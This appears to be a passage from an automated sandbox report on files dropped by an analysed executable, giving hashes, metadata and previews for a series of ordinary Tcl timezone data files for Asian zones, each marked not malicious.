                                                                                                                                                                                                                              SHA-256:06DC608C0B8CDD69CCE66A6BF86F141C46DF39CB45312E684E46F19ED8CAFF15
                                                                                                                                                                                                                              SHA-512:9A633B629873E5EE5AF923A94865EBE5FD9ECA181B2C47B7368A0828468715E07AD3FD825D5E2312D2D0BA1FA5490E3817C36B6339824C8012A0B75538C4A0DC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Almaty) {.. {-9223372036854775808 18468 0 LMT}.. {-1441170468 18000 0 +05}.. {-1247547600 21600 0 +06}.. {354909600 25200 1 +06}.. {370717200 21600 0 +06}.. {386445600 25200 1 +06}.. {402253200 21600 0 +06}.. {417981600 25200 1 +06}.. {433789200 21600 0 +06}.. {449604000 25200 1 +06}.. {465336000 21600 0 +06}.. {481060800 25200 1 +06}.. {496785600 21600 0 +06}.. {512510400 25200 1 +06}.. {528235200 21600 0 +06}.. {543960000 25200 1 +06}.. {559684800 21600 0 +06}.. {575409600 25200 1 +06}.. {591134400 21600 0 +06}.. {606859200 25200 1 +06}.. {622584000 21600 0 +06}.. {638308800 25200 1 +06}.. {654638400 21600 0 +06}.. {670363200 18000 0 +05}.. {670366800 21600 1 +05}.. {686091600 18000 0 +05}.. {695768400 21600 0 +06}.. {701812800 25200 1 +06}.. {717537600 21600 0 +06}.. {733262400 25200 1 +06}.. {748987200 21600 0 +06}.. {764712
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2682
                                                                                                                                                                                                                              Entropy (8bit):3.7873260611521915
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5MUNHl0Nhb9bGA9jSb0PWtsjOuH7Ay2n3yy7QYoTZg703q4oPuJ9/YXjpdaOP9kA:Fz0T52akyId7+xOXdkwqeIFcR
                                                                                                                                                                                                                              MD5:7E70BD44FBF5BF70E3C5246D3A83A49B
                                                                                                                                                                                                                              SHA1:10A28B0A3189DF347CF9853C024E9467CAC56DBA
                                                                                                                                                                                                                              SHA-256:B70AABECACD3F62AF506DF395AB44F47F2CA091522B04EC87AC1407172DD1BFA
                                                                                                                                                                                                                              SHA-512:766565F837EB777749B2C8AAE6C73A2274A772CEF12E7C2E30A89809FEF1E9ED6B067DF044A4676AA4BE76A64A904692C3887336BF01BA4D5D9A5020FB792938
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Amman) {.. {-9223372036854775808 8624 0 LMT}.. {-1230776624 7200 0 EET}.. {108165600 10800 1 EEST}.. {118270800 7200 0 EET}.. {136591200 10800 1 EEST}.. {149806800 7200 0 EET}.. {168127200 10800 1 EEST}.. {181342800 7200 0 EET}.. {199749600 10800 1 EEST}.. {215643600 7200 0 EET}.. {231285600 10800 1 EEST}.. {244501200 7200 0 EET}.. {262735200 10800 1 EEST}.. {275950800 7200 0 EET}.. {481154400 10800 1 EEST}.. {496962000 7200 0 EET}.. {512949600 10800 1 EEST}.. {528670800 7200 0 EET}.. {544399200 10800 1 EEST}.. {560120400 7200 0 EET}.. {575848800 10800 1 EEST}.. {592174800 7200 0 EET}.. {610581600 10800 1 EEST}.. {623624400 7200 0 EET}.. {641167200 10800 1 EEST}.. {655074000 7200 0 EET}.. {671839200 10800 1 EEST}.. {685918800 7200 0 EET}.. {702856800 10800 1 EEST}.. {717973200 7200 0 EET}.. {733701600 10800 1 EEST}.. {749422800
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2086
                                                                                                                                                                                                                              Entropy (8bit):3.7698340044911616
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5DeEdVrEOeFt7YFpR2kHmxCcUdBbcHDLV2vpXt25A0UeRr9ydzkMfF6USRWk9UuV:5ZejsFLrcZwvJt2F+doTr9Q3G80
                                                                                                                                                                                                                              MD5:6EFC35043BDCA4AB61D72E931DB954E6
                                                                                                                                                                                                                              SHA1:F0B4E76C154DC773073E41AA8E94030E972A986A
                                                                                                                                                                                                                              SHA-256:D9DF64FDA4638F7604624B0F68A885D5ABADB1DE12AF1AF5581C2AF7DD971562
                                                                                                                                                                                                                              SHA-512:16AE582B113D6960C73B64620A8AF20F9D436AA4B3EC8E881617AED3389EB4357931882103F162F19EE8202953A7E6FB4FDD6D7760FB7621F4DB9D229AD13F17
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Anadyr) {.. {-9223372036854775808 42596 0 LMT}.. {-1441194596 43200 0 +12}.. {-1247572800 46800 0 +14}.. {354884400 50400 1 +14}.. {370692000 46800 0 +13}.. {386420400 43200 0 +13}.. {386424000 46800 1 +13}.. {402231600 43200 0 +12}.. {417960000 46800 1 +13}.. {433767600 43200 0 +12}.. {449582400 46800 1 +13}.. {465314400 43200 0 +12}.. {481039200 46800 1 +13}.. {496764000 43200 0 +12}.. {512488800 46800 1 +13}.. {528213600 43200 0 +12}.. {543938400 46800 1 +13}.. {559663200 43200 0 +12}.. {575388000 46800 1 +13}.. {591112800 43200 0 +12}.. {606837600 46800 1 +13}.. {622562400 43200 0 +12}.. {638287200 46800 1 +13}.. {654616800 43200 0 +12}.. {670341600 39600 0 +12}.. {670345200 43200 1 +12}.. {686070000 39600 0 +11}.. {695746800 43200 0 +13}.. {701791200 46800 1 +13}.. {717516000 43200 0 +12}.. {733240800 46800 1 +13}.. {748965
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1665
                                                                                                                                                                                                                              Entropy (8bit):3.7149890651919644
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5uvFlvNhQQvmRKqv0fvzQIovWdvEGvDaDvs5vZlovKWyvNSvTqvIkhYwr:sFBNKs6b03zB0WJEuDa7sFZiKWaN6TiF
                                                                                                                                                                                                                              MD5:A72FB1FE01C93BD7E0A8136635C72639
                                                                                                                                                                                                                              SHA1:2383CF839F50784D4BF8B7EDDB324C80E2DDD0DC
                                                                                                                                                                                                                              SHA-256:96B510AF9B8C6BC1DFA84E9ED5E072F3FD484EEB66BBEBC7B6826ED859ED9027
                                                                                                                                                                                                                              SHA-512:061FECE3C750C0229638DD8AF38FB3E8E48E59E0DE1B13BCFE46483A7A170B71B9BCB0D6F110B6B2EF68510FA940F9066F14CBD59829E222D6644D3657CE1893
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Aqtau) {.. {-9223372036854775808 12064 0 LMT}.. {-1441164064 14400 0 +04}.. {-1247544000 18000 0 +05}.. {370724400 21600 0 +06}.. {386445600 18000 0 +05}.. {386449200 21600 1 +05}.. {402256800 18000 0 +05}.. {417985200 21600 1 +05}.. {433792800 18000 0 +05}.. {449607600 21600 1 +05}.. {465339600 18000 0 +05}.. {481064400 21600 1 +05}.. {496789200 18000 0 +05}.. {512514000 21600 1 +05}.. {528238800 18000 0 +05}.. {543963600 21600 1 +05}.. {559688400 18000 0 +05}.. {575413200 21600 1 +05}.. {591138000 18000 0 +05}.. {606862800 21600 1 +05}.. {622587600 18000 0 +05}.. {638312400 21600 1 +05}.. {654642000 18000 0 +05}.. {670366800 14400 0 +04}.. {670370400 18000 1 +04}.. {686095200 14400 0 +04}.. {695772000 18000 0 +05}.. {701816400 21600 1 +05}.. {717541200 18000 0 +05}.. {733266000 21600 1 +05}.. {748990800 18000 0 +05}.. {7647156
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1666
                                                                                                                                                                                                                              Entropy (8bit):3.721746335201775
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5FUvalvNhQQvmRKqv0fvzQIovWdvEGvDaDvs5vZlovKWyvNSvTqvIQvyovklvqQR:PwaBNKs6b03zB0WJEuDa7sFZiKWaN6Tt
                                                                                                                                                                                                                              MD5:E278B985BD2515DBCAED8CB741BE9208
                                                                                                                                                                                                                              SHA1:BC9F5E72C430661D7ED1AF04571CE5D0F73DD18D
                                                                                                                                                                                                                              SHA-256:991638FA2AB2A2F7A091A23D78D99306EE73A740F1A03FBAC448EDCAB55A0E38
                                                                                                                                                                                                                              SHA-512:9951DB729B837647CC4B3D2E605525DCCBAFFD39D76460331BF62235DCAE5E4470CDA578F940B1739AABFEC55D293FF60D79AE0EFDFE1EB64E84571881FDEA6A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Aqtobe) {.. {-9223372036854775808 13720 0 LMT}.. {-1441165720 14400 0 +04}.. {-1247544000 18000 0 +05}.. {354913200 21600 1 +06}.. {370720800 21600 0 +06}.. {386445600 18000 0 +05}.. {386449200 21600 1 +05}.. {402256800 18000 0 +05}.. {417985200 21600 1 +05}.. {433792800 18000 0 +05}.. {449607600 21600 1 +05}.. {465339600 18000 0 +05}.. {481064400 21600 1 +05}.. {496789200 18000 0 +05}.. {512514000 21600 1 +05}.. {528238800 18000 0 +05}.. {543963600 21600 1 +05}.. {559688400 18000 0 +05}.. {575413200 21600 1 +05}.. {591138000 18000 0 +05}.. {606862800 21600 1 +05}.. {622587600 18000 0 +05}.. {638312400 21600 1 +05}.. {654642000 18000 0 +05}.. {670366800 14400 0 +04}.. {670370400 18000 1 +04}.. {686095200 14400 0 +04}.. {695772000 18000 0 +05}.. {701816400 21600 1 +05}.. {717541200 18000 0 +05}.. {733266000 21600 1 +05}.. {748990
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):878
                                                                                                                                                                                                                              Entropy (8bit):3.937249024843323
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5ggeRMdIQvNcDvNhQQvmRKqvzQfv7PQIovWxrvEGvDWdDvs5v/RlovKTob3CGcr:5gbkvNSvNhQQvmRKqv0fvzQIovWdvEGD
                                                                                                                                                                                                                              MD5:259179C7A1CA04F9F3A373B6C8FCB8C5
                                                                                                                                                                                                                              SHA1:D042DF8EFD8EC1473B45B1131BD5EB714F1B2C17
                                                                                                                                                                                                                              SHA-256:13745BFA25E6E2D8D0FABAE42CB7C37CF9F974CFB343D4FE84E4E2D64A25926B
                                                                                                                                                                                                                              SHA-512:703BEAD5A1E5B3816D98057A08A87C2139F418787F38561FE35175B84E2005365727F85D1B949CC5DF464B207A7D01BB65FB1A632E73DDA523E843B82D76FBBD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Ashgabat) {.. {-9223372036854775808 14012 0 LMT}.. {-1441166012 14400 0 +04}.. {-1247544000 18000 0 +05}.. {354913200 21600 1 +05}.. {370720800 18000 0 +05}.. {386449200 21600 1 +05}.. {402256800 18000 0 +05}.. {417985200 21600 1 +05}.. {433792800 18000 0 +05}.. {449607600 21600 1 +05}.. {465339600 18000 0 +05}.. {481064400 21600 1 +05}.. {496789200 18000 0 +05}.. {512514000 21600 1 +05}.. {528238800 18000 0 +05}.. {543963600 21600 1 +05}.. {559688400 18000 0 +05}.. {575413200 21600 1 +05}.. {591138000 18000 0 +05}.. {606862800 21600 1 +05}.. {622587600 18000 0 +05}.. {638312400 21600 1 +05}.. {654642000 18000 0 +05}.. {670366800 14400 0 +04}.. {670370400 18000 1 +04}.. {686095200 14400 0 +04}.. {695772000 18000 0 +05}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):182
                                                                                                                                                                                                                              Entropy (8bit):4.801820439218014
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8xEYM4DyXHAIgN/ZEYovFvWARL/2WFKUNSH+WFKYEQ:SlSWB9vsM3yR+HAIgH8VWAN/2wKUNSeq
                                                                                                                                                                                                                              MD5:5193EF7ADB646798801245BC50C8DDA6
                                                                                                                                                                                                                              SHA1:83ED851CBC60EFB330A8FC119E1BED5B4C0BA630
                                                                                                                                                                                                                              SHA-256:2C752F641B98E3C05B14AE31330D1F198DAA4A7E354BA9670C7754926BFB891A
                                                                                                                                                                                                                              SHA-512:E940E1BE67A9AC895F3D060B1CB34797A429147A9DC2AC0F1162D37D86661EF217EDABA720F0AE3796186FE801229210AC785BB4511CBBE5A41791D236101D8C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Ashgabat)]} {.. LoadTimeZoneFile Asia/Ashgabat..}..set TZData(:Asia/Ashkhabad) $TZData(:Asia/Ashgabat)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1666
                                                                                                                                                                                                                              Entropy (8bit):3.7265766742957402
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:55TvFlvNhQQvmRKqv0fvzQIovWdvEGvDaDvs5vZlovKWyvNSvTqvIQvyovklvqQJ:XrFBNKs6b03zB0WJEuDa7sFZiKWaN6Tl
                                                                                                                                                                                                                              MD5:0236793F90ABC6F68718DDBB44AF5E2F
                                                                                                                                                                                                                              SHA1:A5EFAEEF9B9159E748A3FED231F8A978E400482E
                                                                                                                                                                                                                              SHA-256:4B7B118E6AE72D41740CF0CB2BD8E970700758DCBC0DD6F298199D841DF8408E
                                                                                                                                                                                                                              SHA-512:851C7A9C110790454312BB9C5B5D3C426365EEF4673191B9ABB2E4A32301894C5FB1ADCBE2A4C67BEE416AD63FB8BED85F94EF9BF42473DA4BFFA7824935A1D5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Atyrau) {.. {-9223372036854775808 12464 0 LMT}.. {-1441164464 10800 0 +03}.. {-1247540400 18000 0 +05}.. {370724400 21600 0 +06}.. {386445600 18000 0 +05}.. {386449200 21600 1 +05}.. {402256800 18000 0 +05}.. {417985200 21600 1 +05}.. {433792800 18000 0 +05}.. {449607600 21600 1 +05}.. {465339600 18000 0 +05}.. {481064400 21600 1 +05}.. {496789200 18000 0 +05}.. {512514000 21600 1 +05}.. {528238800 18000 0 +05}.. {543963600 21600 1 +05}.. {559688400 18000 0 +05}.. {575413200 21600 1 +05}.. {591138000 18000 0 +05}.. {606862800 21600 1 +05}.. {622587600 18000 0 +05}.. {638312400 21600 1 +05}.. {654642000 18000 0 +05}.. {670366800 14400 0 +04}.. {670370400 18000 1 +04}.. {686095200 14400 0 +04}.. {695772000 18000 0 +05}.. {701816400 21600 1 +05}.. {717541200 18000 0 +05}.. {733266000 21600 1 +05}.. {748990800 18000 0 +05}.. {764715
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1702
                                                                                                                                                                                                                              Entropy (8bit):3.7261419515679393
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5/eVvyGiHD6UC4UrUomFMmUZcjbUKNFcUEUvUOpU8MYUWCUlbf/U9bUiUUybUQUF:5m8G9mFdnNF1FfsTuvQXHCe
                                                                                                                                                                                                                              MD5:690013310A46BD1AE250A5E019353809
                                                                                                                                                                                                                              SHA1:0DF434C7EEB707DC071007FAB112F4DEB37E936F
                                                                                                                                                                                                                              SHA-256:D20B75D2604C3B742C1629C5EE02CFF6783E472249982B272B68F2A6DE9BDC38
                                                                                                                                                                                                                              SHA-512:FF8C33E55E4F006C38D3FD37A1AD3E1200718CA374ECBEAE8255C7635912F0BB23A59A600BF7130D5660A24C515F726E8440D0D908E560CB59F74059638E6AA2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Baghdad) {.. {-9223372036854775808 10660 0 LMT}.. {-2524532260 10656 0 BMT}.. {-1641005856 10800 0 +03}.. {389048400 14400 0 +03}.. {402264000 10800 0 +03}.. {417906000 14400 1 +03}.. {433800000 10800 0 +03}.. {449614800 14400 1 +03}.. {465422400 10800 0 +03}.. {481150800 14400 1 +03}.. {496792800 10800 0 +03}.. {512517600 14400 1 +03}.. {528242400 10800 0 +03}.. {543967200 14400 1 +03}.. {559692000 10800 0 +03}.. {575416800 14400 1 +03}.. {591141600 10800 0 +03}.. {606866400 14400 1 +03}.. {622591200 10800 0 +03}.. {638316000 14400 1 +03}.. {654645600 10800 0 +03}.. {670464000 14400 1 +03}.. {686275200 10800 0 +03}.. {702086400 14400 1 +03}.. {717897600 10800 0 +03}.. {733622400 14400 1 +03}.. {749433600 10800 0 +03}.. {765158400 14400 1 +03}.. {780969600 10800 0 +03}.. {796694400 14400 1 +03}.. {812505600 10800 0 +03}.. {82831
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):171
                                                                                                                                                                                                                              Entropy (8bit):4.784355129067593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8hkXHAIgNvZORL/2WFKENUKMFB/4WFKKB:SlSWB9vsM3yBkHAIgPON/2wKENUr/4wT
                                                                                                                                                                                                                              MD5:1B5E0D449DAEF469D586A853CB3073AD
                                                                                                                                                                                                                              SHA1:FD735B0472B31644E787767B82B737CC39EC4175
                                                                                                                                                                                                                              SHA-256:3D437037FBF2BBDF969C8E71967080947F24860D431B39F5D8F23151316ABCD5
                                                                                                                                                                                                                              SHA-512:2A2DC33D4258A5E1AE59172883F3B11723798ED35CF5AF1B8BA81A8807DC6F8222C8044D82B152EF6AF43E7350FEB2625D4406C6C7DD309CE65810EA3D3286B6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Qatar)]} {.. LoadTimeZoneFile Asia/Qatar..}..set TZData(:Asia/Bahrain) $TZData(:Asia/Qatar)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2149
                                                                                                                                                                                                                              Entropy (8bit):3.6155622322573713
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5/eFdqlykbocXcwJUE5iu8JmFebARoc9lVNk7/9bq8dq16b3C9UPBUTIEjvZJ+76:5RsUf8mFpNWFny1ZGMte3aivUKo
                                                                                                                                                                                                                              MD5:294DFC98F67AC00A188EC3D3B87C501C
                                                                                                                                                                                                                              SHA1:93C434CD9AA170E35AD676C88EE09986A94EC02A
                                                                                                                                                                                                                              SHA-256:873E8F08B87610D0DAFE239D32345248A4595C6B13D1DA83EC214D78E88FA12C
                                                                                                                                                                                                                              SHA-512:5346082CCA733724C0D2C36B768467E59BA9ED6452B6CF1BA923AF4F0D2BC05C67DB49E804CA81DAD449D30D0835026D708D9AB632D02FDA1EA1A0BF717111DE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Baku) {.. {-9223372036854775808 11964 0 LMT}.. {-1441163964 10800 0 +03}.. {-405140400 14400 0 +04}.. {354916800 18000 1 +04}.. {370724400 14400 0 +04}.. {386452800 18000 1 +04}.. {402260400 14400 0 +04}.. {417988800 18000 1 +04}.. {433796400 14400 0 +04}.. {449611200 18000 1 +04}.. {465343200 14400 0 +04}.. {481068000 18000 1 +04}.. {496792800 14400 0 +04}.. {512517600 18000 1 +04}.. {528242400 14400 0 +04}.. {543967200 18000 1 +04}.. {559692000 14400 0 +04}.. {575416800 18000 1 +04}.. {591141600 14400 0 +04}.. {606866400 18000 1 +04}.. {622591200 14400 0 +04}.. {638316000 18000 1 +04}.. {654645600 14400 0 +04}.. {670370400 10800 0 +03}.. {670374000 14400 1 +03}.. {686098800 10800 0 +03}.. {701823600 14400 1 +03}.. {717548400 14400 0 +04}.. {820440000 14400 0 +04}.. {828234000 18000 1 +05}.. {846378000 14400 0 +04}.. {852062400
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):181
                                                                                                                                                                                                                              Entropy (8bit):4.911309754748998
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2WFKELYOiMXGm2OHB+keoHvZKmrROpDovFFsQ+8EXVeVSYe:SlSWB9eg/2wKELeDm2OHxeoHvZ3FO1og
                                                                                                                                                                                                                              MD5:9AC4947AC29C797055B7EBFA4F6AC710
                                                                                                                                                                                                                              SHA1:E7758A9A8BFA255F6B2D27F5366D9FE2A26DDF6C
                                                                                                                                                                                                                              SHA-256:6E72BA908F250FD45D554A12E3E7B3BD2F1C02A6C2431F806FD2A054F843AA90
                                                                                                                                                                                                                              SHA-512:F9D0F0CB7D3726C2AB3B5049429172D9DD4BA21353F6F98570CBA4EE969F7D97BD973CB165AECFF930AFFA8633E8052624D44EE7FB91763681ED3F78A61F4F98
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Bangkok) {.. {-9223372036854775808 24124 0 LMT}.. {-2840164924 24124 0 BMT}.. {-1570084924 25200 0 +07}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2117
                                                                                                                                                                                                                              Entropy (8bit):3.7025684250364725
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5VeTtXJfsFN/3sFrOksF/sF7IyksF7FRZsFLsFTsFcsFk73sFK/XCFKTipnFEnsr:5n40yVRB7VfXucdKmtTTDOV
                                                                                                                                                                                                                              MD5:6CC13B6910412A3A3D16CA36ADF00352
                                                                                                                                                                                                                              SHA1:061CF4A8FEA8C139F50F96E6B6506B50ED3DD792
                                                                                                                                                                                                                              SHA-256:992F93A7975F8CD4E94D96B3BA1ECFB3585E52A53F4442A15993402D3F955F66
                                                                                                                                                                                                                              SHA-512:4E9750B1C3C0BA4F7922BCBC76276A3E74031D78A98E21DC59F66D6EA8E1B70865BBEB50A6B77EB0423421A18428B97B47412053CE15213128CEED669F4DD6E8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Barnaul) {.. {-9223372036854775808 20100 0 LMT}.. {-1579844100 21600 0 +06}.. {-1247551200 25200 0 +08}.. {354906000 28800 1 +08}.. {370713600 25200 0 +07}.. {386442000 28800 1 +08}.. {402249600 25200 0 +07}.. {417978000 28800 1 +08}.. {433785600 25200 0 +07}.. {449600400 28800 1 +08}.. {465332400 25200 0 +07}.. {481057200 28800 1 +08}.. {496782000 25200 0 +07}.. {512506800 28800 1 +08}.. {528231600 25200 0 +07}.. {543956400 28800 1 +08}.. {559681200 25200 0 +07}.. {575406000 28800 1 +08}.. {591130800 25200 0 +07}.. {606855600 28800 1 +08}.. {622580400 25200 0 +07}.. {638305200 28800 1 +08}.. {654634800 25200 0 +07}.. {670359600 21600 0 +07}.. {670363200 25200 1 +07}.. {686088000 21600 0 +06}.. {695764800 25200 0 +08}.. {701809200 28800 1 +08}.. {717534000 25200 0 +07}.. {733258800 28800 1 +08}.. {748983600 25200 0 +07}.. {76470
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8024
                                                                                                                                                                                                                              Entropy (8bit):3.7230911686481774
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:4nBKPP8LFH0TDkywaZb1QSCK5VUjiO1PoBQpo7778CZicJZS80EGcLt4Mok1MgJl:4M38LCRZb+sAiO1PoBQpo1ikjD
                                                                                                                                                                                                                              MD5:1D99E2BBB01B1669403CFBAF7E03F733
                                                                                                                                                                                                                              SHA1:DBDD58C7FD195FC602C4541D6F416CC96094C121
                                                                                                                                                                                                                              SHA-256:17AF14646D562AFE17DCCFD1D2FBA95C122F3E0263906A36EB48BFF04ACF233E
                                                                                                                                                                                                                              SHA-512:98524E8DCD17C090058F17BDA1200D9801EB1B14EB5CEB8C31149A4A402A53BA4923A2AFF457E0A72DAA601D88095247806F945F704000F874FCBF73631DD135
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Beirut) {.. {-9223372036854775808 8520 0 LMT}.. {-2840149320 7200 0 EET}.. {-1570413600 10800 1 EEST}.. {-1552186800 7200 0 EET}.. {-1538359200 10800 1 EEST}.. {-1522551600 7200 0 EET}.. {-1507514400 10800 1 EEST}.. {-1490583600 7200 0 EET}.. {-1473645600 10800 1 EEST}.. {-1460948400 7200 0 EET}.. {-399866400 10800 1 EEST}.. {-386650800 7200 0 EET}.. {-368330400 10800 1 EEST}.. {-355114800 7200 0 EET}.. {-336794400 10800 1 EEST}.. {-323578800 7200 0 EET}.. {-305172000 10800 1 EEST}.. {-291956400 7200 0 EET}.. {-273636000 10800 1 EEST}.. {-260420400 7200 0 EET}.. {78012000 10800 1 EEST}.. {86734800 7200 0 EET}.. {105055200 10800 1 EEST}.. {118270800 7200 0 EET}.. {136591200 10800 1 EEST}.. {149806800 7200 0 EET}.. {168127200 10800 1 EEST}.. {181342800 7200 0 EET}.. {199749600 10800 1 EEST}.. {212965200 7200 0 EET}.. {231285600 10800
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1669
                                                                                                                                                                                                                              Entropy (8bit):3.7443715330695735
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5qvdJqxiF0rvK5XvV4vUzvCjvT7voPvkPvJUbvn0vYpv99v3uvuWvKJhv3T:Ad1mzK5/VkULCbTjoHkHJUDnQYV9p3mO
                                                                                                                                                                                                                              MD5:1EE8FF3DF0D931A140ADBB021EB3BFEB
                                                                                                                                                                                                                              SHA1:F1F15EF70C4E9F456849AF89CAC97AD747D9E192
                                                                                                                                                                                                                              SHA-256:1D5E9A8F6A04273AF741F648EF10718B004A60D7884FE432DDF85A8F558BEA98
